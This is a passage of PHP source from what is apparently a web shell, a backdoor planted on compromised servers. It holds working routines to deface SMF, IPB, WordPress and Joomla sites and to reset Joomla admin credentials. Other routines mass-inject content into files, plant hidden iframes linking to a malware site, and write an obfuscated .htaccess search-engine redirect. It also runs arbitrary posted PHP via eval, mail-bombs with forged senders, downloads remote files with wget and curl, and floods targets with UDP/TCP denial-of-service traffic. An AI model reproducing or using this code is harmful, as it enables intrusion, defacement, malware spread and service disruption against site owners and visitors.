  1955. {
  1956. $head = $_POST['head'];
  1957. $catid = $_POST['f5'];
  1959. $con =@ mysql_connect($localhost,$username,$password);
  1960. $db =@ mysql_select_db($database,$con);
  1961. if($prefix == "" || $prefix == null)
  1962. $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
  1963. else
  1964. $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
  1965. $result =@ mysql_query($query,$con);
  1966. if($result)
  1967. echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
  1968. else
  1969. echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
  1970. }
  1971. else if($_POST['forumdeface'] == "ipb")
  1972. {
  1973. $head = $_POST['head'];
  1974. $catid = $_POST['f5'];
  1976. $IPB = "forums";
  1977. $con =@ mysql_connect($localhost,$username,$password);
  1978. $db =@ mysql_select_db($database,$con);
  1979. if($prefix == "" || $prefix == null)
  1980. $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
  1981. else
  1982. $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
  1983. if($result)
  1984. echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
  1985. else
  1986. echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
  1987. }
  1988. else if($_POST['forumdeface'] == "wp")
  1989. {
  1990. $catid = $_POST['f5'];
  1991. $head = $_POST['head'];
  1993. $con =@ mysql_connect($localhost,$username,$password);
  1994. $db =@ mysql_select_db($database,$con);
  1995. if($prefix == "" || $prefix == null)
  1996. {
  1997. if(isset($_POST["alll"]) && $_POST["alll"] == "All")
  1998. $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
  1999. else
  2000. $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
  2001. }
  2002. else
  2003. {
  2004. if(isset($_POST["alll"]) && $_POST["alll"] == "All")
  2005. $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
  2006. else
  2007. $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
  2009. }
  2010. $result =@mysql_query($query,$con) or mysql_error();
  2011. if($result)
  2012. echo "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
  2013. else
  2014. echo "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
  2015. }
  2016. else if($_POST['forumdeface'] == "joomla")
  2017. {
  2018. $site_url = $_POST['siteurl'];
  2019. $dbprefix = $_POST['tableprefix'];
  2020. $dbname = $_POST['f2'];
  2021. $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
  2023. function randomt()
  2024. {
  2025. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  2026. srand((double)microtime()*1000000);
  2027. $i = 0;
  2028. $pass = '' ;
  2030. while ($i <= 7)
  2031. {
  2032. $num = rand() % 33;
  2033. $tmp = substr($chars, $num, 1);
  2034. $pass = $pass . $tmp;
  2035. $i++;
  2036. }
  2038. return $pass;
  2039. }
  2040. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
  2041. {
  2042. $ar0=explode($marqueurDebutLien, $text);
  2043. $ar1=explode($marqueurFinLien, $ar0[$i]);
  2044. $ar=trim($ar1[0]);
  2045. return $ar;
  2046. }
  2047. $co=randomt();
  2049. $link=mysql_connect($localhost,$username,$password) ;
  2050. mysql_select_db($dbname,$link);
  2052. $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
  2054. $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
  2056. if ( $req )
  2057. {
  2058. $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
  2059. $data = mysql_fetch_array($req);
  2060. $template_name=$data["template"];
  2062. $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
  2063. $data = mysql_fetch_array($req);
  2064. $template_id=$data["extension_id"];
  2066. $url2=$site_url."/index.php";
  2068. $ch = curl_init();
  2069. curl_setopt($ch, CURLOPT_URL, $url2);
  2070. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2071. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2072. curl_setopt($ch, CURLOPT_HEADER, 1);
  2073. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2074. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2075. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2078. $buffer = curl_exec($ch);
  2080. $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
  2081. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
  2084. $url2=$site_url."/index.php";
  2085. $ch = curl_init();
  2086. curl_setopt($ch, CURLOPT_URL, $url2);
  2087. curl_setopt($ch, CURLOPT_POST, 1);
  2088. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
  2089. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2090. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2091. curl_setopt($ch, CURLOPT_HEADER, 0);
  2092. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2093. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2094. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2095. $buffer = curl_exec($ch);
  2097. $pos = strpos($buffer,"com_config");
  2098. if($pos === false)
  2099. {
  2100. echo("<br>[-] Login Error");
  2101. exit;
  2102. }
  2104. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  2105. $ch = curl_init();
  2106. curl_setopt($ch, CURLOPT_URL, $url2);
  2107. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2108. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2109. curl_setopt($ch, CURLOPT_HEADER, 0);
  2110. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2111. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2113. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2114. $buffer = curl_exec($ch);
  2116. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
  2117. if(!$hidden2)
  2118. {
  2119. echo("<br>[-] index.php Not found in Theme Editor");
  2120. exit;
  2121. }
  2123. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  2125. $ch = curl_init();
  2126. curl_setopt($ch, CURLOPT_URL, $url2);
  2127. curl_setopt($ch, CURLOPT_POST, 1);
  2128. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&");
  2130. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2131. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2132. curl_setopt($ch, CURLOPT_HEADER, 0);
  2133. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2134. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2135. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2136. $buffer = curl_exec($ch);
  2138. $pos = strpos($buffer,'<dd class="message message">');
  2139. if($pos === false)
  2140. {
  2141. echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
  2142. }
  2143. else
  2144. {
  2145. echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
  2146. }
  2147. }
  2148. else
  2149. {
  2150. $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
  2151. $data = mysql_fetch_array($req);
  2152. $template_name=$data["template"];
  2154. $url2=$site_url."/index.php";
  2155. $ch = curl_init();
  2156. curl_setopt($ch, CURLOPT_URL, $url2);
  2157. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2158. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2159. curl_setopt($ch, CURLOPT_HEADER, 1);
  2160. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2161. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2162. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2163. $buffer = curl_exec($ch);
  2165. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
  2167. $url2=$site_url."/index.php";
  2168. $ch = curl_init();
  2169. curl_setopt($ch, CURLOPT_URL, $url2);
  2170. curl_setopt($ch, CURLOPT_POST, 1);
  2171. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
  2172. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2173. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2174. curl_setopt($ch, CURLOPT_HEADER, 0);
  2175. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2176. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2177. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2178. $buffer = curl_exec($ch);
  2180. $pos = strpos($buffer,"com_config");
  2182. if($pos === false)
  2183. {
  2184. echo("<br>[-] Login Error");
  2185. exit;
  2186. }
  2188. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  2189. $ch = curl_init();
  2190. curl_setopt($ch, CURLOPT_URL, $url2);
  2191. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2192. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2193. curl_setopt($ch, CURLOPT_HEADER, 0);
  2194. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2195. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2196. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2197. $buffer = curl_exec($ch);
  2199. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
  2201. if(!$hidden2)
  2202. {
  2203. echo("<br>[-] index.php Not found in Theme Editor");
  2204. }
  2206. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  2207. $ch = curl_init();
  2208. curl_setopt($ch, CURLOPT_URL, $url2);
  2209. curl_setopt($ch, CURLOPT_POST, 1);
  2210. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  2211. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2212. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2213. curl_setopt($ch, CURLOPT_HEADER, 0);
  2214. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2215. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2216. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2217. $buffer = curl_exec($ch);
  2219. $pos = strpos($buffer,'<dd class="message message fade">');
  2220. if($pos === false)
  2221. {
  2222. echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
  2223. exit;
  2224. }
  2225. else
  2226. {
  2227. echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
  2228. }
  2229. }
  2230. }
  2231. }
  2232. else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
  2233. {
  2234. $filetype = $_POST['filetype'];
  2236. $mode = "a";
  2238. if($_POST['mode'] == 'Apender')
  2239. $mode = "a";
  2241. if($_POST['mode'] == 'Overwriter')
  2242. $mode = "w";
  2244. if (is_dir($_POST['pathtomass']))
  2245. {
  2246. $lolinject = $_POST['injectthis'];
  2247. $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
  2248. if(substr($_POST['pathtomass'], -1) == "\\")
  2249. $mypath = $_POST['pathtomass'] . "*.".$filetype;
  2250. foreach (glob($mypath) as $injectj00)
  2251. {
  2252. if($injectj00 == __FILE__)
  2253. continue;
  2254. $fp=fopen($injectj00,$mode);
  2255. if (fputs($fp,$lolinject))
  2256. echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
  2257. else
  2258. echo 'failed to inject '.$injectj00.'<br>';
  2259. }
  2260. }
  2261. else
  2262. echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
  2263. }
  2264. else if(isset($_POST['mailfunction']))
  2265. {
  2266. if($_POST['mailfunction'] == "dobombing")
  2267. {
  2268. if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
  2269. {
  2270. $times = $_POST['times'];
  2271. while($times--)
  2272. {
  2273. if(isset($_POST['padding']))
  2274. {
  2275. $fromPadd = rand(0,9999);
  2276. $subjectPadd = " -- ID : ".rand(0,9999999);
  2277. $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
  2279. }
  2280. $from = "president$";
  2281. if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
  2282. {
  2283. $error = 1;
  2284. echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
  2285. break;
  2286. }
  2287. }
  2288. if($error != 1)
  2289. echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
  2290. }
  2291. }
  2292. else if($_POST['mailfunction'] == "massmailing")
  2293. {
  2294. if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
  2295. {
  2296. if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
  2297. echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
  2298. else
  2299. echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
  2300. }
  2301. }
  2302. }
  2303. else if(isset($_POST['code']))
  2304. {
  2305. if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
  2306. {
  2307. // FIlter Some Chars we dont need
  2308. ?><br>
  2309. <textarea name="code" class="box" cols="120" rows="10"><?php
  2310. $code = str_replace("<?php","",$_POST['code']);
  2311. $code = str_replace("<?","",$code);
  2312. $code = str_replace("?>","",$code);
  2314. // Evaluate PHP CoDE!
  2315. htmlspecialchars(eval($code));
  2316. ?>
  2317. </textarea><?php
  2318. }
  2319. else if($_POST['code'] != null && $_POST['intext'] == "false")
  2320. {
  2321. $code = str_replace("<?php","",$_POST['code']);
  2322. $code = str_replace("<?","",$code);
  2323. $code = str_replace("?>","",$code);
  2325. // Evaluate PHP CoDE!
  2326. ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
  2327. }
  2328. }
  2329. else if(isset($_GET['infect']))
  2330. {
  2331. $coun = 0;
  2332. $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
  2333. foreach (glob($_GET['path'] . "*.php") as $injectj00)
  2334. {
  2335. if($injectj00 == __FILE__)
  2336. continue;
  2337. if($myfile=fopen($injectj00,'a'))
  2338. {
  2339. fputs($myfile, $str);
  2340. fclose($myfile);
  2341. $coun = 1;
  2342. }
  2343. }
  2344. foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
  2345. {
  2346. if($myfile=fopen($injectj00,'a'))
  2347. {
  2348. fputs($myfile, $str);
  2349. fclose($myfile);
  2350. $coun = 1;
  2351. }
  2352. }
  2353. foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
  2354. {
  2355. if($myfile=fopen($injectj00,'a'))
  2356. {
  2357. fputs($myfile, $str);
  2358. fclose($myfile);
  2359. $coun = 1;
  2360. }
  2361. }
  2364. if($coun == 1)
  2365. echo "<center>Done !!!!<center>";
  2366. else
  2367. echo "<center>Cannot open files !!!!<center>";
  2368. }
  2369. else if(isset($_GET['redirect']))
  2370. {
  2371. if($myfile = fopen(".htaccess",'a'))
  2372. {
  2373. $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
  2374. fwrite($myfile, gzuncompress(base64_decode($mal)));
  2375. fwrite($myfile, "\n\r");
  2376. fclose($myfile);
  2377. echo "<center>Done !!!!<center>";
  2378. }
  2379. else
  2380. echo "<center>Cannot open file !!!!<center>";
  2381. }
  2382. else if(isset($_GET['malware']))
  2383. { ?>
  2384. <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
  2385. <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
  2386. <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
  2387. <div id="showmal"></div>
  2388. <?php
  2389. }
  2390. else if(isset($_GET['codeinsert']))
  2391. {
  2392. if($file1 = fopen(".htaccess",'r'))
  2393. {
  2394. ?><div id="showcode"></div>
  2395. <form method=post>
  2396. <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
  2397. <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
  2398. </form>
  2399. <?php }
  2400. else
  2401. echo "<center>Cannot Open File!!</center>";
  2402. }
  2403. else if(isset($_POST['getcode']))
  2404. {
  2405. if($myfile = fopen(".htaccess",'a'))
  2406. {
  2407. fwrite($myfile, $_POST['getcode']);
  2408. fwrite($myfile, "\n\r");
  2409. fclose($myfile);
  2410. echo "<font class=txt>Code Inserted Successfully!!!!</font>";
  2411. }
  2412. else
  2413. echo "Permission Denied";
  2414. }
  2415. else if(isset($_GET['uploadurl']))
  2416. {
  2417. $functiontype = trim($_GET['functiontype']);
  2418. $wurl = trim($_GET['wurl']);
  2419. $path = magicboom($_GET['path']);
  2421. function remotedownload($cmd,$url)
  2422. {
  2423. $namafile = basename($url);
  2424. switch($cmd)
  2425. {
  2426. case 'wwget':
  2427. execmd(which('wget')." ".$url." -O ".$namafile);
  2428. break;
  2429. case 'wlynx':
  2430. execmd(which('lynx')." -source ".$url." > ".$namafile);
  2431. break;
  2432. case 'wfread' :
  2433. execmd($wurl,$namafile);
  2434. break;
  2435. case 'wfetch' :
  2436. execmd(which('fetch')." -o ".$namafile." -p ".$url);
  2437. break;
  2438. case 'wlinks' :
  2439. execmd(which('links')." -source ".$url." > ".$namafile);
  2440. break;
  2441. case 'wget' :
  2442. execmd(which('GET')." ".$url." > ".$namafile);
  2443. break;
  2444. case 'wcurl' :
  2445. execmd(which('curl')." ".$url." -o ".$namafile);
  2446. break;
  2447. default:
  2448. break;
  2449. }
  2450. return $namafile;
  2451. }
  2452. $namafile = remotedownload($functiontype,$wurl);
  2453. $fullpath = $path . $directorysperator . $namafile;
  2454. if(is_file($fullpath))
  2455. {
  2456. echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
  2457. }
  2458. else
  2459. echo "<center>Failed to upload $namafile</center>";
  2460. }
  2461. else if(isset($_GET['createfolder']))
  2462. {
  2463. if(!mkdir($_GET['createfolder']))
  2464. echo "Failed To create";
  2465. else
  2466. echo "<font class=txt>Folder Created Successfully</font>";
  2467. }
  2468. else if(isset($_GET['selfkill']))
  2469. {
  2470. if(unlink(__FILE__))
  2471. echo "<br><center><font size=5>Good Bye......</font></center>";
  2472. else
  2473. echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
  2474. }
  2475. else if(isset($_GET['Create']))
  2476. {
  2477. ?>
  2478. <form method="post">
  2479. <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
  2480. <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
  2481. <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
  2482. </form>
  2484. <?php }
  2485. else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
  2486. {
  2487. $content = $_POST['filecontent'];
  2488. if($file_pointer = fopen($_POST['filecreator'], "w+"))
  2489. {
  2490. fwrite($file_pointer, $content);
  2491. fclose($file_pointer);
  2492. echo "<font class=txt>File Created Successfully</font>";
  2493. }
  2494. else
  2495. echo "Cannot Create File";
  2496. }
  2497. else if(isset($_REQUEST["defaceforum"]))
  2498. {
  2499. ?>
  2500. <center><div id="showdeface"></div>
  2501. <font color="#FF0000" size="4">Forum Index Changer</font>
  2502. <form action="<?php echo $self; ?>" method = "POST">
  2503. <input type="hidden" name="forum">
  2504. <input type="hidden" name="defaceforum">
  2505. <table border = "1" width="60%" style="text-align: center;border-color:#333333;" align="center">
  2506. <tr>
  2507. <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
  2509. <td width="50%"><b> Database :</b> <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
  2510. <tr><td height="50" width="50%"><b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> </td>
  2511. <td><b> Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
  2513. <tr><td height="50" width="50%">Type :
  2514. <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
  2515. <option value="vb">vbulletin</option>
  2516. <option value="mybb">Mybb</option>
  2517. <option value="smf">SMF</option>
  2518. <option value="ipb">IPB</option>
  2519. <option value="wp">Wordpress</option>
  2520. <option value="joomla">Joomla</option>
  2521. </select></td>
  2522. <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
  2524. </tr>
  2525. <tr>
  2526. <td height="167" width="50%" colspan=2>
  2527. <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" name="siteurl" width="80" value=""></p></div>
  2529. <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked">&nbsp; <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
  2530. <label id="wordpres" style="display:none; float:right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="checked"> All</label></p>
  2531. </div>
  2533. <p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
  2534. <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
  2535. </td>
  2536. </tr>
  2537. </table>
  2538. </form>
  2539. </center>
  2540. <?php
  2541. }
  2542. else if(isset($_GET["passwordchange"]))
  2543. {
  2544. echo "<center>";
  2545. ?>
  2546. <div id="showchangepass"></div>
  2547. <font color="#FF0000" size="4">Forum Password Changer</font>
  2548. <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value);return false;">
  2549. <table border = "1" width="60%" height="246" style="text-align: center;border-color:#333333;" align="center">
  2550. <tr>
  2551. <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50">&nbsp;<b> DataBase :</b> <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> <b>Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
  2552. <tr>
  2553. <td height="50" width="50%">Type :
  2554. <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
  2555. <option value="vb">vbulletin</option>
  2556. <option value="mybb">Mybb</option>
  2557. <option value="smf">SMF</option>
  2558. <option value="ipb">IPB</option>
  2559. <option value="phpbb">PHPBB</option>
  2560. <option value="wp">Wordpress</option>
  2561. <option value="joomla">Joomla</option>
  2562. </select></td>
  2563. <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
  2564. </tr>
  2565. <tr>
  2566. <td colspan=2 height="100" width="780">
  2568. <p align="center"><div id="fid" style="display:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
  2570. <div id="joomla" style="display:none;"><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
  2572. <div id="wpress" style="display:none;"><p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"></div>
  2574. <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
  2575. </tr>
  2576. </table>
  2577. </form>
  2578. </center>
  2579. <?php
  2580. }
  2581. else if(isset($_GET['dosser']))
  2582. {
  2583. if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
  2584. $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
  2585. {
  2586. $IP=$_GET['ip'];
  2587. $port=$_GET['port'];
  2588. $executionTime = $_GET['exTime'];
  2589. $no0fBytes = $_GET['no0fBytes'];
  2590. $data = "";
  2591. $timeout = $_GET['timeout'];
  2592. $packets = 0;
  2593. $counter = $no0fBytes;
  2594. $maxTime = time() + $executionTime;;
  2595. while($counter--)
  2596. {
  2597. $data .= "X";
  2598. }
  2599. $data .= " Dhanush";
  2601. while(1)
  2602. {
  2603. $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
  2604. if($socket)
  2605. {
  2606. fwrite($socket , $data);
  2607. fclose($socket);
  2608. $packets++;
  2609. }
  2610. if(time() >= $maxTime)
  2611. {
  2612. break;
  2613. }
  2614. }
  2615. echo "Dos Completed!<br>";
  2616. echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
  2617. echo "Total Number of Packets Sent : " . $packets . "<br />";
  2618. echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
  2619. echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
  2620. }
  2621. }
  2622. else if(isset($_GET['fuzzer']))
  2623. {
  2624. if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
  2625. {
  2626. $IP=$_GET['ip'];
  2627. $port=$_GET['port'];
  2628. $times = $_GET['exTime'];
  2629. $timeout = $_GET['timeout'];
  2630. $send = 0;
  2631. $ending = "";
  2632. $multiplier = $_GET['multiplier'];
  2633. $data = "";
  2634. $mode="tcp";
  2635. $data .= "GET /";
  2636. $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
  2637. if($_GET['type'] == "tcp")
  2638. {
  2639. $mode = "tcp";
  2640. }
  2642. while($multiplier--)
  2643. {
  2644. $data .= urlencode($_GET['no0fBytes']);
  2645. }
  2646. $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
  2647. $data .= "by-Dhanush".$ending;
  2648. $length = strlen($data);
  2651. echo "Sending Data :- <br /> <p align='center'>$data</p>";
  2653. for($i=0;$i<$times;$i++)
  2654. {
  2655. $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
  2656. if($socket)
  2657. {
  2658. fwrite($socket , $data , $length );
  2659. fclose($socket);
  2660. }
  2661. }
  2662. echo "Fuzzing Completed!<br>";
  2663. echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
  2664. echo "Total Number of Packets Sent : " . $times . "<br />";
  2665. echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
  2666. echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
  2667. }
  2668. }
  2669. else if(isset($_GET['bypassit']))
  2670. {
  2671. if(isset($_GET['copy']))
  2672. {
  2673. if(@copy($_GET['copy'],"test1.php"))
  2674. {
  2675. $fh=fopen("test1.php",'r');
  2676. echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
  2677. @fclose($fh);
  2678. unlink("test1.php");
  2679. }
  2680. }
  2681. else if(isset($_GET['imap']))
  2682. {
  2683. $string = $_GET['imap'];
  2684. echo "<textarea cols=120 rows=20 class=box readonly>";
